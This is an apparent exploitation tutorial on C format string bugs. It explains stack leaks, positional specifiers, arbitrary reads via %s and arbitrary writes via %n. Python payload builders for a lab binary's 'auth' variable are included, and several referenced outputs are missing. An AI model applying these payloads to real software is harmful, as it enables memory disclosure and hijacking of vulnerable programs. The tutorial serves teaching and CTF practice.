Format String Bug

Reading memory off the stack

A format string bug is dangerous and easy to exploit. Manipulated correctly, it can be leveraged to perform powerful actions such as reading from and writing to arbitrary memory locations.

Why it exists

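In C, certain functions accept "format specifiers" within strings. Let's look at an example:

int value = 1205;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);

This prints out:

Decimal: 1205
Float: 1205.000000
Hex: 0x4b5

So, it replaced %d with the decimal value, %f with the float value and %x with the hex representation.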

This is a nice way of formatting strings in C (string concatenation is quite complicated in C). Let's try printing the same value in hex 3 times, with printf("%x %x %x", value, value, value).

As expected, we get 4b5 4b5 4b5.

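What happens, however, if we don't have enough arguments for all the format specifiers, as in printf("%x %x %x", value)?

The first value is still 4b5, but it is followed by two values we never passed in. Erm... what happened here?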

The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well, the real issue is when C code takes user-provided input and passes it to printf as the format string itself, for example printf(buffer) instead of printf("%s", buffer).

If we give such a program ordinary text, it works as expected and simply echoes the input back.

But what happens if we input format string specifiers, such as %x?

It reads values off the stack and returns them, as the developer wasn't expecting so many format string specifiers.

Choosing Offsets

Printing the same value 3 times with printf("%x %x %x", value, value, value) gets tedious, so there is a better way in C: printf("%1$x %1$x %1$x", value).

The 1$ between the % and the x tells printf to use the first parameter (this positional syntax is a POSIX extension that glibc supports). However, this also means that attackers can read values at an arbitrary offset from the top of the stack. Say we know there is a canary at the 6th %p: instead of sending %p %p %p %p %p %p we can just send %6$p. This allows us to be much more efficient.
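The saving is easy to see when the payload is generated programmatically. Here is a minimal Python sketch that builds both the long-hand and the positional form. The helper names are illustrative and not part of any library.

```python
def sequential_leak(count, conversion="p"):
    """Long-hand payload: one specifier per stack slot, e.g. b'%p %p %p'."""
    return " ".join(f"%{conversion}" for _ in range(count)).encode()


def positional_leak(offset, conversion="p"):
    """Positional payload that asks printf for a single slot, e.g. b'%6$p'."""
    if offset < 1:
        raise ValueError("positional offsets start at 1")
    return f"%{offset}${conversion}".encode()


if __name__ == "__main__":
    print(sequential_leak(6))   # b'%p %p %p %p %p %p'
    print(positional_leak(6))   # b'%6$p'
```

The positional form stays a handful of bytes however deep the target slot is, which matters when the input buffer is small.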

Arbitrary Reads

In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value off the stack, you read the value at the memory address it points to.
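The difference between printing a stack value and dereferencing it can be shown with a toy model in Python. This is only a simulation: memory, stack and both helper functions are made up for illustration, and real addresses are of course not indexes into a short byte string.

```python
# Toy address space: "addresses" are simply indexes into this byte string.
memory = b"junk\x00\x7fELF\x01\x01\x01\x00more\x00"

# Toy stack: each slot holds a number that happens to be a valid toy address.
stack = [0x5, 0xD]


def fmt_p(slot):
    """Model of %p: print the stack value itself."""
    return hex(stack[slot])


def fmt_s(slot):
    """Model of %s: treat the stack value as an address and read up to the next null byte."""
    start = stack[slot]
    end = memory.index(b"\x00", start)
    return memory[start:end]


if __name__ == "__main__":
    print(fmt_p(0))  # 0x5
    print(fmt_s(0))  # b'\x7fELF\x01\x01\x01'
```

The same slot gives two very different results: %p shows the number stored on the stack, while %s follows it and returns whatever bytes live at that location.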

Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.

Let's look back at the previous program and its output:

You may notice that the last two values contain the hex encoding of our own input, "%x ". That's because we're reading the buffer itself. Here it's at the 4th offset - if we can write an address into the buffer and then point %s at it, we get an arbitrary read!
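Spotting your own input among leaked values is easier if the hex words are turned back into bytes. Here is a small Python sketch, assuming a 32-bit little-endian target. The two leaked words are illustrative values chosen to match an input of repeated "%x ", not output captured from the program.

```python
import struct


def leaked_words_to_bytes(words):
    """Convert hex words printed by %x into the bytes they occupy in memory."""
    # "<I" packs each value as a 4-byte little-endian unsigned integer,
    # which is how a 32-bit x86 stack slot is laid out in memory.
    return b"".join(struct.pack("<I", int(word, 16)) for word in words)


if __name__ == "__main__":
    print(leaked_words_to_bytes(["25207825", "78252078"]))  # b'%x %x %x'
```

Each word looks reversed when printed because %x shows the slot as a number, while the bytes sit in memory lowest byte first.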

%p prints a pointer; generally it prints the same value as %x but prefixed with 0x, which makes it stand out more.

As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the base address of the ELF file into the buffer and reads it with %s - if all goes well, it should read the first bytes of the file, which are always \x7fELF. Start with the basics:

Nice, it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:

It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte: in little-endian order, 0x8048000 is stored as \x00\x80\x04\x08. We have to put the format specifier first.
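The null byte comes from the way the address is laid out in memory. Here is a quick check in Python, using struct as a stand-in for pwntools' p32 and assuming a 32-bit little-endian target. The address-first payload is a hypothetical reconstruction for illustration.

```python
import struct

BASE_ADDRESS = 0x8048000  # base address quoted in the text

packed = struct.pack("<I", BASE_ADDRESS)  # little-endian: lowest byte first
payload = packed + b"%6$s"                # hypothetical address-first payload

# printf treats the format string as a C string, so it only sees the bytes
# before the first null byte.
seen_by_printf = payload.split(b"\x00", 1)[0]

if __name__ == "__main__":
    print(packed)          # b'\x00\x80\x04\x08'
    print(seen_by_printf)  # b''
```

With the address first, printf sees an empty string and never reaches the specifier.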

Let's break down the payload:

We add 4 | because we want the address to fill exactly one 4-byte stack slot, not half of one and half of another, which would result in reading the wrong address.
The offset is %8$p because the start of the buffer is generally at %6$p. However, stack slots are 4 bytes long each and the specifier plus padding already take up 8 bytes, so the address sits two slots further along, at %8$p.
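The breakdown above can be sketched as a small Python helper. It assumes a 32-bit little-endian target, uses struct in place of pwntools' p32, and takes the buffer offset of 6 and the 8-byte prefix from the text. The function and parameter names are illustrative.

```python
import struct

WORD = 4  # bytes per stack slot on 32-bit x86


def build_read_payload(address, buffer_offset=6, prefix_len=8, conversion="p"):
    """Specifier first, '|' padding up to prefix_len, then the packed address."""
    if prefix_len % WORD:
        raise ValueError("prefix must fill whole stack slots")
    # The address starts prefix_len bytes into the buffer, i.e. this many
    # slots past the slot where the buffer begins.
    target_offset = buffer_offset + prefix_len // WORD
    spec = f"%{target_offset}${conversion}".encode()
    if len(spec) > prefix_len:
        raise ValueError("specifier does not fit in the prefix")
    prefix = spec.ljust(prefix_len, b"|")
    return prefix + struct.pack("<I", address)


if __name__ == "__main__":
    print(build_read_payload(0x8048000))  # b'%8$p||||\x00\x80\x04\x08'
```

Passing conversion="s" gives the same layout with %8$s, which dereferences the address instead of printing it.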

It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.

Now let's replace the p with an s.

Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.

Arbitrary Writes

Luckily C contains a rarely-used format specifier, %n. This specifier takes a pointer (memory address) and writes to it the number of characters printed so far. If we can control the input, we can control how many characters are written and also where we write them.

Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch to completely understand it, but let's jump into a basic binary.
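One such approach, not named in the text above but part of standard C, is the %hhn length modifier, which stores only the lowest byte of the running count. A large value can then be written one byte at a time, so no single write needs more than 255 characters of padding. Here is a minimal Python sketch of the arithmetic. The function name and the already_written parameter are illustrative.

```python
def hhn_paddings(value, already_written=0, width=4):
    """Return how many extra characters to print before each %hhn write.

    Bytes are written lowest address first (little-endian order). Because
    %hhn keeps only the low byte of the character count, each padding is
    the distance to the next target byte modulo 256.
    """
    paddings = []
    written = already_written
    for i in range(width):
        target = (value >> (8 * i)) & 0xFF
        pad = (target - written) % 256
        paddings.append(pad)
        written += pad
    return paddings


if __name__ == "__main__":
    # 16 characters already printed, e.g. four 4-byte addresses up front.
    print(hhn_paddings(0x08048000, already_written=16))  # [240, 128, 132, 4]
```

That is 504 padding characters in total rather than roughly 134 million. A padding of 0 means no extra characters are needed before that write.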

Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.

Work out the location of auth

As it's a global variable, it's within the binary itself. We can find its location by listing the binary's symbols with readelf (the -s option prints the symbol table).

Location of auth is 0x0804c028.

Writing the Exploit

We're lucky there are no null bytes in the address, so there's no need to change the order.

Buffer is the 7th %p.
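Putting these pieces together, the payload needs the address of auth at the start of the buffer, enough filler to bring the printed character count to 10, and a %7$n that uses the address as its pointer. Here is a sketch in Python, using struct in place of pwntools' p32. The '|' filler is an arbitrary choice and the function name is illustrative.

```python
import struct

AUTH_ADDRESS = 0x0804C028  # location of auth found above
BUFFER_OFFSET = 7          # the buffer is the 7th %p
TARGET_VALUE = 10          # value auth must hold


def build_write_payload(address, value, offset):
    """Address first, then filler so that exactly `value` characters precede %n."""
    packed = struct.pack("<I", address)  # 4 bytes, all printed by printf
    if b"\x00" in packed:
        raise ValueError("address contains a null byte; it cannot go first")
    if value < len(packed):
        raise ValueError("value is smaller than the bytes already printed")
    filler = b"|" * (value - len(packed))
    return packed + filler + f"%{offset}$n".encode()


if __name__ == "__main__":
    print(build_write_payload(AUTH_ADDRESS, TARGET_VALUE, BUFFER_OFFSET))
    # b'(\xc0\x04\x08||||||%7$n'
```

The four address bytes count towards the total, so only six filler characters are needed to reach 10.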

And easy peasy:

Pwntools

As you can expect, pwntools has a handy feature for automating %n format string exploits: fmtstr_payload, which takes an offset and a dictionary of writes.

The offset in this case is 7 because the 7th %p read the buffer; each dictionary key is the location you want to write to and its value is what to write there. Note that you can add as many location-value pairs to the dictionary as you want.

You can also grab the location of the auth symbol with pwntools, by loading the binary with the ELF class and looking auth up in its symbols dictionary.

Check out the pwntools tutorials for more cool features.
